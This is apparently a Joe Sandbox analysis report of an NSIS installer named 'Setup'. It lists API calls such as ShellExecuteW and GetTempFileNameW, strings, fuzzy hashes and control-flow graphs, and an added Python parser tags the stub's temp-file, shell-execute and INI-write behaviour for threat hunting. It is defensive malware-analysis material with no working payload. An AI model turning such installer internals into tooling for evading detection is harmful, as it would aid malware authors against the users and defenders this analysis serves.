• GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
• RegisterClassW.USER32(00476A40), ref: 00405B36
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
• CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
• ShowWindow.USER32(00000005,00000000), ref: 00405BBD
• LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
• LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
• GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
• GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
• RegisterClassW.USER32(00476A40), ref: 00405BFF
• DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
• String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
• API String ID: 608394941-2746725676
• Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
• Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
• Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
• Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Control-flow Graph (graph image not available in this export)

APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• lstrcatW.KERNEL32(00000000,00000000,ForbesHarvardKennedyMarchOthers,004D70B0,00000000,00000000), ref: 00401A76
• CompareFileTime.KERNEL32(-00000014,?,ForbesHarvardKennedyMarchOthers,ForbesHarvardKennedyMarchOthers,00000000,00000000,ForbesHarvardKennedyMarchOthers,004D70B0,00000000,00000000), ref: 00401AA0
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
Strings
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
• String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$ForbesHarvardKennedyMarchOthers
• API String ID: 4286501637-1056575836
• Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
• Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
• Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
• Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Control-flow Graph (graph image for function 0040337F; edge dump omitted)
APIs
• GetTickCount.KERNEL32 ref: 004033F1
• GetTickCount.KERNEL32 ref: 00403492
• MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
• wsprintfW.USER32 ref: 004034CE
• WriteFile.KERNELBASE(00000000,00000000,00427976,00403792,00000000), ref: 004034FF
• WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
Strings
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: CountFileTickWrite$wsprintf
• String ID: (]C$... %d%%$pAB$v9B$vyB
• API String ID: 651206458-1903973402
• Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
• Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
• Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
• Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Control-flow Graph (graph image for function 004035B3; edge dump omitted)
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                        Strings
                                                                                                                                        • soft, xrefs: 004036A1
                                                                                                                                        • Error launching installer, xrefs: 00403603
                                                                                                                                        • Null, xrefs: 004036AA
                                                                                                                                        • Inst, xrefs: 00403698
                                                                                                                                         • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 004037F1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                        • API String ID: 4283519449-527102705
                                                                                                                                        • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                        • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                         Control-flow Graph (block ranges and edges in text form; the executed/not-executed colouring of the rendered graph is not recoverable here)
                                                                                                                                         control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                                                                                        • lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                                                                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                                                                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2740478559-0
                                                                                                                                        • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                        • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                        • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                        • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                         Control-flow Graph (block ranges and edges in text form; the executed/not-executed colouring of the rendered graph is not recoverable here)
                                                                                                                                         control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                        Strings
                                                                                                                                        • <RM>, xrefs: 00402713
                                                                                                                                        • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                                                                                        • ForbesHarvardKennedyMarchOthers, xrefs: 00402770
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                        • String ID: <RM>$ForbesHarvardKennedyMarchOthers$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                        • API String ID: 247603264-3860356937
                                                                                                                                        • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                        • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                        • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                        • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                         Control-flow Graph (block ranges and edges in text form; the executed/not-executed colouring of the rendered graph is not recoverable here)
                                                                                                                                         control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FE6
                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,759223A0,00000000), ref: 00404FF9
                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                        • API String ID: 3156913733-2180253247
                                                                                                                                        • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                        • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                        • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                        • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                         Control-flow Graph (block ranges and edges in text form; the executed/not-executed colouring of the rendered graph is not recoverable here)
                                                                                                                                         control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                         • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                                        • String ID: nsa
                                                                                                                                        • API String ID: 1716503409-2209301699
                                                                                                                                        • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                        • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                        • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                        • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
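Added example, not Joe Sandbox code and not code from the sample: a small parser for the per-function API lines this report prints ("• api.MODULE(args), ref: addr", with the optional "Part of subcall function" prefix), run over the lines of the GetTickCount/GetTempFileNameW function at 405eab and the ShellExecuteW function at 4021b5 listed above, plus two heuristics a triager would want next to them. The "nsis-temp-name", "shell-execute" and "ini-write" tags are my own labels, not Joe Sandbox signatures. The prefix logic in nsis_temp_prefix (start from "nsa", add GetTickCount() % 26 to the third letter) and the on-disk pattern in NSIS_TEMP_RE are assumptions reconstructed from the NSIS installer stub source; the report itself only shows GetTickCount, GetTempFileNameW with uUnique = 0 and the string "nsa".

```python
"""Parse Joe Sandbox per-function API lines into records and tag NSIS-stub behaviour."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One API line. Handles the '(args)' form and the bare 'GetTickCount.KERNEL32 ref: ...'
# form, with an optional 'Part of subcall function XXXXXXXX:' prefix. The args group is
# greedy so parentheses inside string arguments (e.g. RemoveDirectory("%s")) survive.
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# On-disk artifact of NSIS temp naming (assumption from NSIS source): GetTempFileName with
# a 3-char prefix and uUnique = 0 yields '<prefix><1-4 hex digits>.tmp', e.g. nsa1F2.tmp.
NSIS_TEMP_RE = re.compile(r"^ns[a-z][0-9A-Fa-f]{1,4}\.tmp$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                    # call-site address ('ref:' field)
    subcall_of: Optional[int]   # callee address when reported as 'Part of subcall function'


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every API line in `text`; non-matching lines (headers, strings) are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        # Argument strings in this report carry no commas, so a plain split is enough.
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def direct_apis(calls: List[ApiCall]) -> set:
    """APIs the function calls itself, excluding those attributed to subcalls."""
    return {c.api for c in calls if c.subcall_of is None}


def flags(calls: List[ApiCall]) -> List[str]:
    """Heuristic tags (my own, not Joe Sandbox signatures) for the NSIS stub functions
    in this report. Order is fixed so results compare stably."""
    direct = direct_apis(calls)
    out = []
    if {"GetTickCount", "GetTempFileNameW"} <= direct:
        out.append("nsis-temp-name")   # temp-name loop at 405eab, String ID 'nsa'
    if "ShellExecuteW" in direct:
        out.append("shell-execute")    # ExecShell at 4021b5: launches extracted content
    if "WritePrivateProfileStringW" in direct:
        out.append("ini-write")        # WriteINIStr at 402713
    return out


def nsis_temp_prefix(tick_count: int) -> str:
    """Assumption from the NSIS stub source: the prefix starts as 'nsa' and the third
    character is advanced by GetTickCount() % 26, giving 'ns' plus one letter a..z."""
    return "ns" + chr(ord("a") + tick_count % 26)


def looks_like_nsis_temp(name: str) -> bool:
    """True for names GetTempFileName would build from such a prefix, e.g. 'nsk1A2.tmp'."""
    return NSIS_TEMP_RE.match(name) is not None


# Constructed input: API lines of two functions copied from this report.
SAMPLE_TEMPNAME = """\
• GetTickCount.KERNEL32 ref: 00405EC9
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
"""
SAMPLE_EXECSHELL = """\
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,759223A0,00000000), ref: 00404FD6
• ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
"""

if __name__ == "__main__":
    for label, text in (("405eab", SAMPLE_TEMPNAME), ("4021b5", SAMPLE_EXECSHELL)):
        calls = parse_api_lines(text)
        print(label, sorted(direct_apis(calls)), flags(calls))
    print("prefix for tick 0x1234:", nsis_temp_prefix(0x1234))
```

Because subcall lines are kept but tagged with the callee address, direct_apis separates what the function does itself from what its helpers do; that is what keeps lstrlenW from 4062CF out of the ExecShell verdict. The third argument of GetTempFileNameW in the report is 00000000 (uUnique = 0), which is what makes the system pick the hex suffix and is why a predictable "ns?XXXX.tmp" name in %TEMP% is a usable hunting artifact.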

                                                                                                                                         Control-flow Graph (block ranges and edges in text form; the executed/not-executed colouring of the rendered graph is not recoverable here)
                                                                                                                                         control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
